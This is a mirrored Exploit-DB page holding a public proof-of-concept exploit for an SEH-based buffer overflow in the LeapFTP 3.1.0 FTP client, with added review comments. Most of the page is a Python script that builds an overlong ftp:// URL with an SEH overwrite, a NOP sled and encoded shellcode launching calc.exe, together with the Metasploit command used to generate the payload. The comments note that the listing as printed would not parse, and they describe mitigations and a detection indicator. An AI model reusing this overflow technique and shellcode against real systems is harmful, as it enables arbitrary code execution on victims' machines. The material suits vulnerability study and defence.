LeapFTP 3.1.0 – URL Handling Buffer Overflow (SEH)

  • 作者: k3170makan
    日期: 2014-09-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34512/
  • # Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
    # Google Dork: "k3170makan is totally awesome" hehehe
    # Date: 2014-08-28
    # Exploit Author: k3170makan
    # Vendor Homepage:http://www.leapware.com/
    # Software Link: http://www.leapware.com/download.html
    # Version: 3.1.0
    # Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)
    # Timeline:
    # *2014-08-28 : Initial contact
    # *2014-09-01 : no contact
    # *2014-09-01 : public disclosure
    """
    This vulnerability was disclosed according to the terms of my public
    disclosure policy (
    http://blog.k3170makan.com/p/public-disclosure-policy.html)
    """
    # NOTE(review): this listing lost its indentation in rendering -- the
    # statements under the "if __name__" guard are printed at the same column
    # as the guard, so the text as shown is not valid Python. Read it as one
    # flat script whose only effect is to write a single file, exploit.txt.
    # It relies on Python 2 string semantics: each literal below is a byte
    # string written verbatim through a text-mode handle. Under Python 3 the
    # same "\xEB..." literals are str and are encoded on write (UTF-8 on most
    # locales), so the bytes on disk would differ -- TODO confirm before
    # treating the offsets below as exact.
    from sys import argv  # argv is never read anywhere in this script
    if __name__ == "__main__":
    # Number of filler bytes that precede the SEH record on the stack; this is
    # the author's figure for version 3.1.0 and the only tunable in the script.
    ovTrigger = 1093
    # Closed explicitly at the end; a with-block would also close it on error.
    f = open("exploit.txt","w")
    # The file holds exactly one ftp:// URL: the defect is in the client's URL
    # handling, so the oversized URL is the whole trigger.
    f.write("ftp://")
    f.write("A"*ovTrigger)
    # Overwritten SEH record, next-handler field first: EB 06 is a short jump
    # six bytes past the end of the jump itself, i.e. over the rest of this
    # field and the handler address below, into the NOP sled; 90 90 is padding.
    f.write("\xEB\x06\x90\x90") #JMP to payload
    # Overwritten handler address (little-endian), chosen to point at a
    # POP/POP/RET sequence so execution lands back on the record above. The
    # page does not say which module the address comes from. SafeSEH/SEHOP
    # block this step outright, and an ASLR-enabled module would make the
    # address unreliable across runs.
    f.write("\x44\xD3\x4A\x77") #POP POP RET
    # 30-byte NOP sled absorbing any small drift in where the jump lands.
    f.write("\x90"*30)
    # The next two lines are ONE comment that the page wrapped: the "-b ..."
    # half is the bad-character list given to msfencode (NUL, LF, CR, 0xFF),
    # which is why the payload is alphanumeric-encoded. As printed, that
    # wrapped half is not a comment and would not parse.
    #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1
    -b \x00\x0a\x0d\xff
    # Encoded payload; per the comment above it launches calc.exe, the usual
    # proof-of-concept marker. It runs from the stack, which DEP would deny.
    shellcode = "\x89\xe0\xd9\xe8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49" +\
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +\
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +\
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +\
    "\x42\x75\x4a\x49\x49\x6c\x68\x68\x4f\x79\x35\x50\x53\x30" +\
    "\x45\x50\x35\x30\x6e\x69\x79\x75\x30\x31\x6a\x72\x30\x64" +\
    "\x4c\x4b\x53\x62\x56\x50\x4e\x6b\x76\x32\x56\x6c\x6c\x4b" +\
    "\x42\x72\x62\x34\x6e\x6b\x54\x32\x46\x48\x76\x6f\x6e\x57" +\
    "\x61\x5a\x67\x56\x45\x61\x39\x6f\x64\x71\x4b\x70\x4e\x4c" +\
    "\x55\x6c\x53\x51\x33\x4c\x67\x72\x76\x4c\x51\x30\x59\x51" +\
    "\x38\x4f\x64\x4d\x45\x51\x49\x57\x4d\x32\x58\x70\x56\x32" +\
    "\x70\x57\x4e\x6b\x31\x42\x76\x70\x4e\x6b\x61\x52\x47\x4c" +\
    "\x73\x31\x5a\x70\x4c\x4b\x57\x30\x53\x48\x6c\x45\x4f\x30" +\
    "\x33\x44\x51\x5a\x65\x51\x48\x50\x42\x70\x6e\x6b\x72\x68" +\
    "\x67\x68\x6c\x4b\x30\x58\x47\x50\x77\x71\x5a\x73\x49\x73" +\
    "\x77\x4c\x71\x59\x6e\x6b\x35\x64\x4e\x6b\x57\x71\x4b\x66" +\
    "\x35\x61\x4b\x4f\x34\x71\x4f\x30\x4e\x4c\x59\x51\x4a\x6f" +\
    "\x74\x4d\x75\x51\x58\x47\x44\x78\x59\x70\x62\x55\x68\x74" +\
    "\x33\x33\x61\x6d\x4b\x48\x65\x6b\x33\x4d\x47\x54\x72\x55" +\
    "\x58\x62\x36\x38\x6e\x6b\x32\x78\x35\x74\x55\x51\x4a\x73" +\
    "\x73\x56\x4e\x6b\x66\x6c\x72\x6b\x6e\x6b\x71\x48\x77\x6c" +\
    "\x47\x71\x78\x53\x6e\x6b\x73\x34\x4e\x6b\x75\x51\x5a\x70" +\
    "\x4b\x39\x77\x34\x35\x74\x71\x34\x31\x4b\x51\x4b\x75\x31" +\
    "\x71\x49\x70\x5a\x66\x31\x4b\x4f\x39\x70\x43\x68\x43\x6f" +\
    "\x53\x6a\x4c\x4b\x42\x32\x38\x6b\x4b\x36\x53\x6d\x42\x4a" +\
    "\x36\x61\x4c\x4d\x4b\x35\x68\x39\x65\x50\x35\x50\x55\x50" +\
    "\x70\x50\x52\x48\x76\x51\x6c\x4b\x62\x4f\x6c\x47\x79\x6f" +\
    "\x6e\x35\x6f\x4b\x4a\x50\x4e\x55\x69\x32\x32\x76\x55\x38" +\
    "\x79\x36\x6c\x55\x6f\x4d\x4d\x4d\x6b\x4f\x78\x55\x75\x6c" +\
    "\x73\x36\x31\x6c\x57\x7a\x4b\x30\x79\x6b\x49\x70\x70\x75" +\
    "\x64\x45\x4f\x4b\x63\x77\x37\x63\x62\x52\x52\x4f\x52\x4a" +\
    "\x77\x70\x56\x33\x69\x6f\x4e\x35\x30\x63\x35\x31\x50\x6c" +\
    "\x51\x73\x36\x4e\x45\x35\x44\x38\x33\x55\x53\x30\x41\x41"
    f.write(shellcode)
    f.flush()
    f.close()
    # Delivery is manual (clipboard into the client), so no network exposure
    # is needed to reproduce. From the defender's side the indicator is an
    # ftp:// URL well over a kilobyte long that is mostly "A" filler, which
    # no legitimate URL resembles; the fix is to retire or update the
    # affected 3.1.0 build.
    #copy contents of exploit.txt to your clipboard and then launch LeapFTP
    <http://about.me/k3170makan>
    Keith Makan <http://about.me/k3170makan>
    about.me/k3170makan
    <http://about.me/k3170makan>